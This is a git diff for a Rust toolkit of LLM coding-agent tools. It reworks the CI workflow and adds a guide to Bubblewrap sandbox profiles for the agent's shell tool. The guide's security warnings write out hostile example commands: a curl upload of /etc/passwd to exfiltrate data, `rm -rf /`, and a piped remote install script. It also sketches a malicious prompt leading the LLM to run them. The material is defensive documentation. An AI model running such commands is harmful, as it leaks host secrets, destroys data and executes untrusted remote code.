diff --git a/.github/workflows/rust.yml b/.github/workflows/rust.yml index 37f6b714..25dbca89 100644 --- a/.github/workflows/rust.yml +++ b/.github/workflows/rust.yml @@ -10,146 +10,206 @@ on: workflow_dispatch: jobs: - build-and-test-async: - name: Build and Test (Async/Tokio) + ci: + name: ${{ matrix.label }} strategy: + fail-fast: false matrix: include: - - os: ubuntu-latest - target: x86_64-unknown-linux-gnu - use-cross: false - - os: windows-latest - target: x86_64-pc-windows-msvc - use-cross: false - - os: macos-latest - target: aarch64-apple-darwin - use-cross: false + - { label: "Async Linux", os: ubuntu-latest, target: x86_64-unknown-linux-gnu, mode: async, linux_bwrap: true } + - { label: "Async Windows", os: windows-latest, target: x86_64-pc-windows-msvc, mode: async, linux_bwrap: false } + - { label: "Async macOS", os: macos-latest, target: aarch64-apple-darwin, mode: async, linux_bwrap: false } + - { label: "Blocking Linux", os: ubuntu-latest, target: x86_64-unknown-linux-gnu, mode: blocking, linux_bwrap: true } + - { label: "Blocking Windows", os: windows-latest, target: x86_64-pc-windows-msvc, mode: blocking, linux_bwrap: false } + - { label: "Blocking macOS", os: macos-latest, target: aarch64-apple-darwin, mode: blocking, linux_bwrap: false } runs-on: ${{ matrix.os }} steps: - uses: actions/checkout@v6 - - name: Run Tests (Async Mode) and Upload Coverage + - name: Run tests (Async) and upload coverage + if: matrix.mode == 'async' uses: Reloaded-Project/devops-rust-test-and-coverage@v1 with: rust-project-path: ./src upload-coverage: true codecov-token: ${{ secrets.CODECOV_TOKEN }} + codecov-flags: async + codecov-name: ${{ matrix.label }} target: ${{ matrix.target }} - use-cross: ${{ matrix.use-cross }} + packages: | + llm-coding-tools-core + llm-coding-tools-agents + llm-coding-tools-serdesai + llm-coding-tools-models-dev + + - name: Run tests (Blocking) and upload coverage + if: matrix.mode == 'blocking' + uses: 
Reloaded-Project/devops-rust-test-and-coverage@v1 + with: + rust-project-path: ./src + upload-coverage: true + codecov-token: ${{ secrets.CODECOV_TOKEN }} + codecov-flags: blocking + codecov-name: ${{ matrix.label }} + target: ${{ matrix.target }} + packages: | + llm-coding-tools-core + llm-coding-tools-models-dev + no-default-features: true + features: "blocking" + + - name: Run Linux-only async feature coverage + if: matrix.mode == 'async' && matrix.linux_bwrap + working-directory: src + shell: bash + run: | + cargo test -p llm-coding-tools-bubblewrap + cargo test -p llm-coding-tools-core --features linux-bubblewrap + cargo test -p llm-coding-tools-serdesai --features linux-bubblewrap + + - name: Run Linux-only blocking feature coverage + if: matrix.mode == 'blocking' && matrix.linux_bwrap + working-directory: src + shell: bash + run: | + cargo test -p llm-coding-tools-bubblewrap --no-default-features --features blocking + cargo test -p llm-coding-tools-core --no-default-features --features blocking,linux-bubblewrap - # Note: The GitHub Runner Images will contain an up to date Rust Stable Toolchain - # thus as per recommendation of cargo-semver-checks, we're using stable here. - # - # Note to reader. If adding this to a new repo, please clear cache. - name: Run cargo-semver-checks - if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') + # Run semver checks only on Linux rows. + # Linux is the only target with additional exported APIs in this workspace + # (`linux-bubblewrap` and the bubblewrap crate itself); current Windows/macOS + # `cfg(...)` usage is implementation-only. Blocking mode still changes public + # signatures via maybe-async, so the Blocking Linux row checks that surface too. 
+ if: (github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/')) && matrix.linux_bwrap working-directory: src shell: bash run: | - # Note: binstall is available after devops-rust-test-and-coverage@v1 call cargo +stable binstall --no-confirm cargo-semver-checks --force rustup +stable target add ${{ matrix.target }} - for CRATE in "llm-coding-tools-core" "llm-coding-tools-agents" "llm-coding-tools-serdesai" "llm-coding-tools-models-dev"; do - SEARCH_RESULT=$(cargo search "^${CRATE}$" --limit 1) - if echo "$SEARCH_RESULT" | grep -q "^${CRATE} "; then - echo "Running semver checks for ${CRATE}..." - # Note: llm-coding-tools-core has mutually exclusive async/blocking features, - # so we must use --only-explicit-features to avoid enabling all features. - # llm-coding-tools-serdesai is async-only. models-dev supports both tokio and blocking. - if [ "${CRATE}" = "llm-coding-tools-core" ]; then - cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features tokio + case "${{ matrix.mode }}" in + async) + for CRATE in "llm-coding-tools-core" "llm-coding-tools-agents" "llm-coding-tools-serdesai" "llm-coding-tools-models-dev"; do + SEARCH_RESULT=$(cargo search "^${CRATE}$" --limit 1) + if echo "$SEARCH_RESULT" | grep -q "^${CRATE} "; then + echo "Running semver checks for ${CRATE}..." 
+ if [ "${CRATE}" = "llm-coding-tools-core" ]; then + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features tokio + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features tokio,linux-bubblewrap + elif [ "${CRATE}" = "llm-coding-tools-serdesai" ]; then + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features full + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features full,linux-bubblewrap + else + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} + fi + else + echo "No previous version of ${CRATE} found on crates.io. Skipping semver checks." + fi + done + + SEARCH_RESULT=$(cargo search "^llm-coding-tools-bubblewrap$" --limit 1) + if echo "$SEARCH_RESULT" | grep -q "^llm-coding-tools-bubblewrap "; then + echo "Running semver checks for llm-coding-tools-bubblewrap..." + cargo +stable semver-checks -p llm-coding-tools-bubblewrap --target ${{ matrix.target }} --only-explicit-features + cargo +stable semver-checks -p llm-coding-tools-bubblewrap --target ${{ matrix.target }} --only-explicit-features --features tokio + cargo +stable semver-checks -p llm-coding-tools-bubblewrap --target ${{ matrix.target }} --only-explicit-features --features blocking else - cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} + echo "No previous version of llm-coding-tools-bubblewrap found on crates.io. Skipping semver checks." fi - else - echo "No previous version of ${CRATE} found on crates.io. Skipping semver checks." - fi - done + ;; + blocking) + for CRATE in "llm-coding-tools-core" "llm-coding-tools-models-dev"; do + SEARCH_RESULT=$(cargo search "^${CRATE}$" --limit 1) + if echo "$SEARCH_RESULT" | grep -q "^${CRATE} "; then + echo "Running semver checks for ${CRATE}..." 
+ if [ "${CRATE}" = "llm-coding-tools-core" ]; then + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features blocking + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features blocking,linux-bubblewrap + else + cargo +stable semver-checks -p "${CRATE}" --target ${{ matrix.target }} --only-explicit-features --features blocking + fi + else + echo "No previous version of ${CRATE} found on crates.io. Skipping semver checks." + fi + done + ;; + esac - name: Check documentation is valid if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') working-directory: src + shell: bash env: RUSTDOCFLAGS: "-D warnings" - # Note: Can't use --all-features at workspace level because tokio/blocking are mutually exclusive run: | - cargo doc -p llm-coding-tools-core --features tokio --document-private-items --no-deps --target ${{ matrix.target }} - cargo doc -p llm-coding-tools-agents --document-private-items --no-deps --target ${{ matrix.target }} - cargo doc -p llm-coding-tools-serdesai --document-private-items --no-deps --target ${{ matrix.target }} - cargo doc -p llm-coding-tools-models-dev --document-private-items --no-deps --target ${{ matrix.target }} + case "${{ matrix.mode }}:${{ matrix.linux_bwrap }}" in + async:true) + cargo doc -p llm-coding-tools-bubblewrap --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-core --features linux-bubblewrap --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-agents --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-serdesai --features linux-bubblewrap --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-models-dev --document-private-items --no-deps --target ${{ matrix.target }} + ;; + async:false) + cargo doc -p llm-coding-tools-core 
--document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-agents --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-serdesai --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-models-dev --document-private-items --no-deps --target ${{ matrix.target }} + ;; + blocking:true) + cargo doc -p llm-coding-tools-bubblewrap --no-default-features --features blocking --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-core --no-default-features --features blocking,linux-bubblewrap --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-models-dev --no-default-features --features blocking --document-private-items --no-deps --target ${{ matrix.target }} + ;; + blocking:false) + cargo doc -p llm-coding-tools-core --no-default-features --features blocking --document-private-items --no-deps --target ${{ matrix.target }} + cargo doc -p llm-coding-tools-models-dev --no-default-features --features blocking --document-private-items --no-deps --target ${{ matrix.target }} + ;; + esac - name: Run linter if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') working-directory: src - # Note: Can't use --all-features at workspace level because tokio/blocking are mutually exclusive + shell: bash run: | - cargo clippy -p llm-coding-tools-core --features tokio --target ${{ matrix.target }} -- -D warnings - cargo clippy -p llm-coding-tools-agents --target ${{ matrix.target }} -- -D warnings - cargo clippy -p llm-coding-tools-serdesai --target ${{ matrix.target }} -- -D warnings - cargo clippy -p llm-coding-tools-models-dev --target ${{ matrix.target }} -- -D warnings - - - name: Run formatter check - uses: actions-rust-lang/rustfmt@v1 - if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') - with: - manifest-path: src/Cargo.toml - 
- build-and-test-blocking: - name: Build and Test (Blocking) - strategy: - matrix: - include: - - os: ubuntu-latest - target: x86_64-unknown-linux-gnu - use-cross: false - - os: windows-latest - target: x86_64-pc-windows-msvc - use-cross: false - - os: macos-latest - target: aarch64-apple-darwin - use-cross: false - - runs-on: ${{ matrix.os }} + case "${{ matrix.mode }}:${{ matrix.linux_bwrap }}" in + async:true) + cargo clippy -p llm-coding-tools-bubblewrap --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-core --features linux-bubblewrap --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-agents --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-serdesai --features linux-bubblewrap --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-models-dev --target ${{ matrix.target }} -- -D warnings + ;; + async:false) + cargo clippy -p llm-coding-tools-core --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-agents --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-serdesai --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-models-dev --target ${{ matrix.target }} -- -D warnings + ;; + blocking:true) + cargo clippy -p llm-coding-tools-bubblewrap --no-default-features --features blocking --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-core --no-default-features --features blocking,linux-bubblewrap --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-models-dev --no-default-features --features blocking --target ${{ matrix.target }} -- -D warnings + ;; + blocking:false) + cargo clippy -p llm-coding-tools-core --no-default-features --features blocking --target ${{ matrix.target }} -- -D warnings + cargo clippy -p llm-coding-tools-models-dev --no-default-features --features blocking --target ${{ matrix.target }} -- -D 
warnings + ;; + esac + + format: + name: Format + runs-on: ubuntu-latest steps: - uses: actions/checkout@v6 - - name: Run Tests (Blocking Mode) and Upload Coverage - uses: Reloaded-Project/devops-rust-test-and-coverage@v1 - with: - rust-project-path: ./src - upload-coverage: true - codecov-token: ${{ secrets.CODECOV_TOKEN }} - target: ${{ matrix.target }} - use-cross: ${{ matrix.use-cross }} - packages: | - llm-coding-tools-core - llm-coding-tools-models-dev - no-default-features: true - features: "blocking" - - - name: Check documentation is valid - if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') - working-directory: src - env: - RUSTDOCFLAGS: "-D warnings" - run: | - cargo doc -p llm-coding-tools-core --no-default-features --features blocking --document-private-items --no-deps --target ${{ matrix.target }} - cargo doc -p llm-coding-tools-models-dev --no-default-features --features blocking --document-private-items --no-deps --target ${{ matrix.target }} - - - name: Run linter (Blocking) - if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') - working-directory: src - run: | - cargo clippy -p llm-coding-tools-core --no-default-features --features blocking --target ${{ matrix.target }} -- -D warnings - cargo clippy -p llm-coding-tools-models-dev --no-default-features --features blocking --target ${{ matrix.target }} -- -D warnings - - name: Run formatter check - uses: actions-rust-lang/rustfmt@v1 if: github.event_name == 'pull_request' || startsWith(github.ref, 'refs/tags/') + uses: actions-rust-lang/rustfmt@v1 with: manifest-path: src/Cargo.toml @@ -157,8 +217,7 @@ jobs: permissions: contents: write - needs: [build-and-test-async, build-and-test-blocking] - # Publish only on tags + needs: [ci, format] if: startsWith(github.ref, 'refs/tags/') runs-on: ubuntu-latest steps: @@ -167,6 +226,7 @@ jobs: with: rust-crates-io-token: ${{ secrets.CRATES_IO_TOKEN }} rust-cargo-project-paths: | + 
+ src/llm-coding-tools-bubblewrap src/llm-coding-tools-core src/llm-coding-tools-agents src/llm-coding-tools-serdesai diff --git a/README.MD b/README.MD index d6b15245..9757f16a 100644 --- a/README.MD +++ b/README.MD @@ -18,6 +18,8 @@ LLM agents: OpenCode agent markdown loader and typed catalogue - **[llm-coding-tools-serdesai](./src/llm-coding-tools-serdesai/)**: serdesAI framework-specific Tool implementations +- **[llm-coding-tools-bubblewrap](./src/llm-coding-tools-bubblewrap/)**: + Linux sandboxing for the Bash tool, built on Bubblewrap (`bwrap`) - **[llm-coding-tools-models-dev](./src/llm-coding-tools-models-dev/)**: models.dev catalog sync with cached fallback and ETag refresh @@ -25,7 +27,7 @@ LLM agents: - **File Operations**: Read, write, edit files with line-numbered output - **Search**: Glob pattern matching and regex content search -- **Shell**: Cross-platform command execution with timeout +- **Shell**: Cross-platform command execution with timeout and optional sandboxing on Linux - **Web**: URL fetching with HTML-to-markdown conversion - **Path Security**: Choose between unrestricted or sandboxed file access - **OpenCode Agents**: Support for OpenCode-style agents @@ -38,6 +40,7 @@ LLM agents: - `tokio` (default): Async mode with tokio runtime - `blocking`: Sync/blocking mode, mutually exclusive with `async` +- `linux-bubblewrap`: Sandboxing for the `bash` tool via Linux `bwrap` ## Quick Start @@ -49,6 +52,7 @@ llm-coding-tools-core = "0.2" # Framework-agnostic tool implementations llm-coding-tools-agents = "0.1" # OpenCode agent markdown loader llm-coding-tools-models-dev = "0.1" # models.dev catalog sync and cache llm-coding-tools-serdesai = "0.2" # serdesAI integration +llm-coding-tools-bubblewrap = "0.1" # Linux Bubblewrap profile and wrapper helpers ``` For a runnable agent setup, start with `llm-coding-tools-serdesai` and the @@ -75,7 +79,9 @@ cargo run --example serdesai-task -p llm-coding-tools-serdesai - [llm-coding-tools-core
README](./src/llm-coding-tools-core/README.md) - [llm-coding-tools-agents README](./src/llm-coding-tools-agents/README.md) - [llm-coding-tools-serdesai README](./src/llm-coding-tools-serdesai/README.md) +- [llm-coding-tools-bubblewrap README](./src/llm-coding-tools-bubblewrap/README.md) - [llm-coding-tools-models-dev README](./src/llm-coding-tools-models-dev/README.md) +- [Sandbox profiles and operator checklist](./SANDBOX-PROFILES.md) - [Developer Guidelines](./src/AGENTS.md) ## Contributing diff --git a/SANDBOX-PROFILES.md b/SANDBOX-PROFILES.md new file mode 100644 index 00000000..acd147bb --- /dev/null +++ b/SANDBOX-PROFILES.md @@ -0,0 +1,299 @@ +# Linux Sandbox Profiles + +This guide covers the Bubblewrap-based Linux sandboxing provided by +`llm-coding-tools-bubblewrap` when the `linux-bubblewrap` feature is enabled. + +## Why Sandboxing Matters + +When an LLM runs shell commands, it can do anything the underlying process +is allowed to do: read secrets, delete files, make network requests to +exfiltrate data, and more. + +Sandboxing puts the shell inside an isolated filesystem so that only the +paths you explicitly allow are visible, and network access can be turned +off entirely. This is enforced by the kernel. + +This system is built on [bubblewrap][bwrap], a lightweight sandboxing tool +that uses Linux kernel namespaces. It is enabled via the `linux-bubblewrap` +Cargo feature flag and requires a Linux host with `bwrap` installed. + +**Important:** the sandbox never silently falls back to host execution. If +`bwrap` is missing or unusable, you get an explicit error instead. + +## The Two Profiles + +There are two preset profiles, each designed for a different trust level. + +### Public Bot + +Use this profile when the LLM is handling **untrusted or hostile input**, +for example a Discord bot or any scenario where you don't fully trust the +prompts being sent. + +Key characteristics: + +- **Network disabled.** No outbound connections at all. 
+- **Minimal filesystem.** Starts from an empty view of the filesystem. + Only selected system runtime roots, a writable workspace, and a synthetic + home are visible. +- **Synthetic home.** A dedicated directory replaces the real home, so + `~/.ssh` and other credential directories are never accessible. +- **Environment scrubbed.** All inherited variables are cleared and only + a sanitized system `PATH` and `HOME` are set. +- **Resolved host shell.** Commands run via a visible system `bash` or + fallback `sh`, not a home-directory or temp `PATH` entry. + +### Trusted Maintenance + +Use this profile for **trusted automation** like CI/CD pipelines, build +jobs, maintenance tasks, and similar workloads where you control the +inputs. + +Key characteristics: + +- **Network enabled.** +- **Full host `/` visible (read-only).** +- **Narrowed writable areas:** only the workspace, a synthetic home, a + cache root, and a configurable sandbox `/tmp` backing. +- **`/etc/shadow` hidden** by a memory overlay. +- **Credential mounts** via `with_credential_file_mounts`, with validation + that destinations stay within allowed directories. + +> **Security warning:** this profile is not safe for untrusted input. +> Network access remains available and the full host filesystem is +> readable. For example, a malicious prompt could trick the LLM into +> running `curl https://example.com --upload-file /etc/passwd` to +> exfiltrate host data, or use `ip addr` to reveal your network +> configuration. Use this profile only for trusted inputs. + +### Quick Comparison + +| Aspect | Public Bot | Trusted Maintenance | +| ---------------------- | ---------------------------------------------- | ----------------------------------------------------- | +| **Use case** | Untrusted / hostile input | Trusted automation (CI/CD, builds, etc.) 
| +| **Network** | Disabled (`--unshare-net`) | Enabled | +| **Host filesystem** | Minimal (bins, libs, workspace) | Full `/` read-only | +| **Writable paths** | Workspace, synthetic home, configurable `/tmp` | Workspace, synthetic home, cache, configurable `/tmp` | +| **Home directory** | Synthetic only | Synthetic + `/home` tmpfs overlay | +| **`/etc` visible** | No | Yes (except `/etc/shadow` tmpfs overlay) | +| **Environment** | Cleared, sanitized system `PATH` + `HOME` | Cleared, sanitized host `PATH` + XDG/build vars | +| **Credential mounts** | Not supported | Supported (validated destinations) | +| **Cache root** | Not mounted | Optional writable bind | +| **Shell** | Visible system `bash`/`sh` | Visible system `bash`/`sh` | +| **Safe for untrusted** | Yes | No | + +## How Sandboxing Works + +The sandbox starts from an **empty filesystem view**. Nothing from the host +is visible unless explicitly mounted in. This section explains the +mechanics. + +### Mount Types + +Bubblewrap provides several ways to bring paths into the sandbox: + +| Type | Flag | Effect | +| -------------- | ----------- | -------------------------------------------------------------- | +| Read-only bind | `--ro-bind` | Read-only access to a host path | +| Writable bind | `--bind` | Read-write access to a host path | +| Memory overlay | `--tmpfs` | Writable directory backed by memory; hides anything underneath | +| Symlink | `--symlink` | Creates a symlink inside the sandbox | + +### Environment Isolation + +The sandbox clears all inherited environment variables with `--clearenv`, +then rebuilds the environment using only explicitly allowed variables via +`--setenv`. This prevents secrets that might be in the parent process from +leaking into the sandbox. + +### Network Isolation + +The `--unshare-net` flag removes all network access inside the sandbox by +placing it in its own network namespace with no network interfaces. 
This +is used by the Public Bot profile and is a kernel-level isolation, not +just a firewall rule. + +### Process Lifecycle + +- `--die-with-parent`: the sandboxed process is killed if the parent + process exits +- `--new-session`: creates a new process session for clean signal handling +- Configurable timeouts with buffered output preservation on kill + +### LLM Awareness + +When the sandbox has network disabled, the system prompt tells the LLM that +network access is unavailable, so it can adjust its behavior accordingly. + +## Profile Details + +### Public Bot + +#### Mounts + +| Path | Type | Purpose | +| ----------------------------------------- | --------------------- | --------------------------------------------------------- | +| Selected system runtime roots (see below) | `--ro-bind` | Common system shells, binaries, and libraries (read-only) | +| `/dev` | `--dev` | Device files (minimal set) | +| `/proc` | `--proc` | Process filesystem | +| `/tmp` | `--tmpfs` or `--bind` | Temporary files; RAM-backed or caller-managed host dir | +| `/workspace` | `--bind` | Working directory (writable) | +| `/home/sandbox` | `--bind` | Synthetic home (writable) | +| `/bin`, `/lib`, `/sbin` (when needed) | `--symlink` | Compatibility links into mounted system roots | + +System runtime roots are selected from the following paths when present: + +- `/usr/bin`, `/usr/lib`, `/lib64` +- `/run/current-system/sw` (NixOS) +- `/nix/store`, `/nix/var/nix/profiles/default` (Nix) + +#### Environment + +| Variable | Value | +| -------- | ------------------------------------------------------------------------------------------------------------- | +| `PATH` | Sanitized system `PATH` derived from the host; excludes home, temp, wrapper, and per-user profile directories | +| `HOME` | `/home/sandbox` | + +#### Network + +Disabled (`--unshare-net`). + +#### Cache Root + +Not mounted. 
A cache root is an optional host directory for storing build +artifacts and other reusable data between sandbox runs. The Public Bot +profile intentionally leaves it out so nothing persists across sessions. + +#### Why These Mounts + +- **System runtime roots**: mounted read-only so the resolved host shell + plus common distro/Nix binaries remain available without exposing the + full host root. +- **`/dev`, `/proc`, sandbox `/tmp`**: provide the minimum runtime surface + for common tools. +- **Real home directory hidden**: prevents accidental secret disclosure + from `~/.ssh` and similar directories. +- **`/etc` omitted**: avoids host-configuration coupling and credential + exposure (no `/etc/passwd` visible). +- **Inherited env cleared**: prevents credential leakage through + environment variables. +- **User-specific and volatile roots hidden**: minimizes attack surface + and information disclosure while still allowing common system binaries. + +Note: Commands that rely on paths like `/etc/alternatives`, `/opt`, or +per-user profile bins may still need explicit extra mounts. 
+ +### Trusted Maintenance + +#### Mounts + +| Path | Type | Purpose | +| ------------------------ | --------------------- | ----------------------------------------------------- | +| `/` | `--ro-bind` | Entire host `/` (read-only) | +| `/home` | `--tmpfs` | Writable overlay (shadows real home) | +| `/etc/shadow` | `--tmpfs` | Shadowed (prevents password hash exposure) | +| `/workspace` | `--bind` | Working directory (writable) | +| `/home/sandbox` | `--bind` | Synthetic home (writable) | +| `/cache` (if configured) | `--bind` | Cache root (writable) | +| `/dev` | `--dev` | Device files | +| `/proc` | `--proc` | Process filesystem | +| `/tmp` | `--tmpfs` or `--bind` | Temporary files on RAM or caller-managed host storage | + +#### Environment + +| Variable | Value | +| ----------------- | ---------------------------------------------------------- | +| `PATH` | Sanitized host `PATH` with hidden/volatile entries removed | +| `HOME` | `/home/sandbox` | +| `TMPDIR` | `/tmp` (matches the configured sandbox tmp backing) | +| `XDG_CACHE_HOME` | `{cache_root}/xdg-cache` | +| `XDG_CONFIG_HOME` | `/home/sandbox/.config` | +| `XDG_STATE_HOME` | `{cache_root}/xdg-state` | + +#### Network + +Enabled by default. + +#### Why These Mounts + +- **Read-only host `/`**: keeps existing toolchains usable without + rebinding every distro-specific path. +- **Writable state narrowed**: synthetic home, workspace, cache root, and + memory overlays provide necessary write locations without exposing + arbitrary host paths. +- **`/etc/shadow` shadowed**: password hashes are not exposed even though + the rest of `/etc` remains visible for compatibility. +- **XDG directories set**: build tools use cache and state directories + without polluting the synthetic home. + +## Security Notes + +### AllowedPathResolver Is Not a Shell Sandbox + +[`AllowedPathResolver`][apr] only constrains structured file tools +(`read`, `write`, `edit`, `glob`, `grep`). It does **not** make shell +execution safe. 
+ +When the `bash` tool is enabled: + +- An LLM can run arbitrary shell commands +- Commands can read, write, or delete any file the process has OS-level + permissions for +- Examples: `cat /etc/passwd`, `rm -rf /`, + `curl https://example.invalid/install.sh | sh` + +If your threat model includes shell execution, use the Linux `bwrap` +sandbox profiles documented here, or disable shell execution entirely. + +### Anti-Patterns to Avoid + +These patterns weaken sandbox isolation: + +- **Real home bind**: mounting the actual home directory exposes SSH keys + and other secrets +- **Full credential-store mounts**: mounting `~/.ssh`, + `~/.config/gcloud`, etc. defeats isolation +- **SSH agent forwarding**: socket forwarding bypasses filesystem + restrictions entirely +- **Broad writable host roots**: writable binds to `/opt`, `/var`, etc. + increase blast radius +- **Unnecessary env passthrough**: `--clearenv` only drops inherited + variables; any secret re-added with `--setenv` is still exposed + +### Best Practices + +For reproducibility and isolation: + +1. **Use a synthetic home** (e.g., `/tmp/sandbox-home-{job-id}`) rather + than the real home directory +2. **Mount cache roots explicitly** for build artifacts that should persist + between runs +3. **Set `XDG_CACHE_HOME` and `XDG_STATE_HOME`** to cache-appropriate + locations inside the sandbox + +## Pre-Deployment Checklist + +Before going into production, verify the following on your target host. +The library handles things like synthetic home setup, environment +scrubbing, and visible system-shell resolution for you. These checks cover what +depends on your environment.
+ +### Host + +- [ ] `bwrap` is installed and on `PATH` +- [ ] Kernel user namespaces are available (check + `sysctl kernel.unprivileged_userns_clone` if applicable) + +### Public Bot + +- [ ] No outbound network connections are possible +- [ ] No host credentials are accessible inside the sandbox +- [ ] Nothing outside the workspace, synthetic home, and sandbox `/tmp` is writable + +### Trusted Maintenance + +- [ ] Cache and build output directories work correctly on your host +- [ ] No unintended host paths are writable from inside the sandbox + +[bwrap]: https://github.com/containers/bubblewrap +[apr]: https://docs.rs/llm-coding-tools-core/latest/llm_coding_tools_core/struct.AllowedPathResolver.html diff --git a/src/.cargo/verify.ps1 b/src/.cargo/verify.ps1 index 481ad21b..482857d8 100644 --- a/src/.cargo/verify.ps1 +++ b/src/.cargo/verify.ps1 @@ -4,6 +4,8 @@ # # Note: llm-coding-tools-serdesai is async-only. # Blocking mode is validated for core and models-dev. +# llm-coding-tools-bubblewrap is Linux-only; all bubblewrap steps +# are skipped on non-Linux platforms. $ErrorActionPreference = "Stop" @@ -30,48 +32,94 @@ $scriptDir = Split-Path -Parent $MyInvocation.MyCommand.Path $projectRoot = Join-Path $scriptDir ".." Set-Location $projectRoot +$onLinux = $IsLinux -eq $true + try { - Write-Host "Building..." -Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-core", "--quiet") -Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-agents", "--quiet") -Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-serdesai", "--quiet") -Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-models-dev", "--quiet") - -Write-Host "Testing..."
-Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-core", "--quiet") -Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-agents", "--quiet") -Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-serdesai", "--quiet") -Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-models-dev", "--quiet") - -Write-Host "Clippy..." -Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-core", "--quiet", "--", "-D", "warnings") -Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-agents", "--quiet", "--", "-D", "warnings") -Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-serdesai", "--quiet", "--", "-D", "warnings") -Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-models-dev", "--quiet", "--", "-D", "warnings") - -Write-Host "Testing blocking feature..." -Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking", "--quiet") -Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-models-dev", "--no-default-features", "--features", "blocking", "--quiet") - -Write-Host "Docs..." -$originalRustdocFlags = $env:RUSTDOCFLAGS -$env:RUSTDOCFLAGS = "-D warnings" -try { - Invoke-LoggedCommand "cargo" @("doc", "--workspace", "--document-private-items", "--no-deps", "--quiet") -} finally { - $env:RUSTDOCFLAGS = $originalRustdocFlags -} + Write-Host "Building (async features)..." + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-core", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-agents", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-serdesai", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-models-dev", "--quiet") + + Write-Host "Testing (async features)..." 
+ Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-core", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-agents", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-serdesai", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-models-dev", "--quiet") + + Write-Host "Clippy (async features)..." + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-core", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-agents", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-serdesai", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-models-dev", "--quiet", "--", "-D", "warnings") + + Write-Host "Building (blocking feature)..." + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-models-dev", "--no-default-features", "--features", "blocking", "--quiet") + + Write-Host "Testing (blocking feature)..." + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-models-dev", "--no-default-features", "--features", "blocking", "--quiet") + + Write-Host "Clippy (blocking feature)..." + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-models-dev", "--no-default-features", "--features", "blocking", "--quiet", "--", "-D", "warnings") + + Write-Host "Docs..." 
